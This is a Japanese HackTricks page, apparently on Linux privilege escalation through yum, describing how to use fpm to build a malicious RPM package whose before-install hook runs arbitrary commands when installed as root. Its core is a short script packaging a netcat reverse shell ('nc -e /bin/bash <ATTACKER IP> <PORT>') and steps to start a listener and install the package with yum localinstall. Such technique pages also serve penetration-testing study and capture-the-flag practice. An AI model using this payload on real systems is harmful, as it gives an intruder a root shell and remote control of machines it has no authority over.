5.4 KiB
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
サイバーセキュリティ会社で働いていますか? HackTricksで会社を宣伝したいですか?または、PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロードしたいですか?SUBSCRIPTION PLANSをチェックしてください!
-
The PEASS Familyを発見しましょう、独占的なNFTのコレクションです。
-
公式のPEASS&HackTricksのグッズを手に入れましょう。
-
💬 Discordグループまたはtelegramグループに参加するか、Twitterでフォローしてください🐦@carlospolopm。
-
ハッキングのトリックを共有するには、hacktricksリポジトリとhacktricks-cloudリポジトリにPRを提出してください。
さらに、yumに関する詳しい例はgtfobinsで見つけることができます。
RPMパッケージを使用した任意のコマンドの実行
環境の確認
この手法を利用するためには、ユーザーは高い特権を持つユーザー(つまり、root)としてyumコマンドを実行できる必要があります。
この手法の動作例
この手法の動作例は、tryhackmeのdaily bugleルームで見つけることができます。
RPMのパッケージ化
以下のセクションでは、fpmを使用してRPMに逆シェルをパッケージ化する方法について説明します。
以下の例では、攻撃者が定義できる任意のスクリプトを持つbefore-installトリガーを含むパッケージを作成します。このパッケージをインストールすると、任意のコマンドが実行されます。デモンストレーションのために、シンプルな逆netcatシェルの例を使用しましたが、必要に応じて変更することができます。
EXPLOITDIR=$(mktemp -d)
CMD='nc -e /bin/bash <ATTACKER IP> <PORT>'
RPMNAME="exploited"
echo $CMD > $EXPLOITDIR/beforeinstall.sh
fpm -n $RPMNAME -s dir -t rpm -a all --before-install $EXPLOITDIR/beforeinstall.sh $EXPLOITDIR
シェルのキャッチ
上記の例を使用し、yum
を高特権ユーザーとして実行できると仮定します。
- ホストにrpmを転送します。
- 例のnetcatリスナーのようなローカルホストでリスナーを開始します。
- 脆弱なパッケージを
yum localinstall -y exploited-1.0-1.noarch.rpm
でインストールします。
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
サイバーセキュリティ企業で働いていますか? HackTricksであなたの会社を宣伝したいですか?または、PEASSの最新バージョンやHackTricksのPDFをダウンロードしたいですか?SUBSCRIPTION PLANSをチェックしてください!
-
The PEASS Familyを発見しましょう。独占的なNFTのコレクションです。
-
公式のPEASS&HackTricksのグッズを手に入れましょう。
-
💬 Discordグループまたはtelegramグループに参加するか、Twitterで私をフォローしてください🐦@carlospolopm.
-
**ハッキングのトリックを共有するには、hacktricksリポジトリとhacktricks-cloudリポジトリ**にPRを提出してください。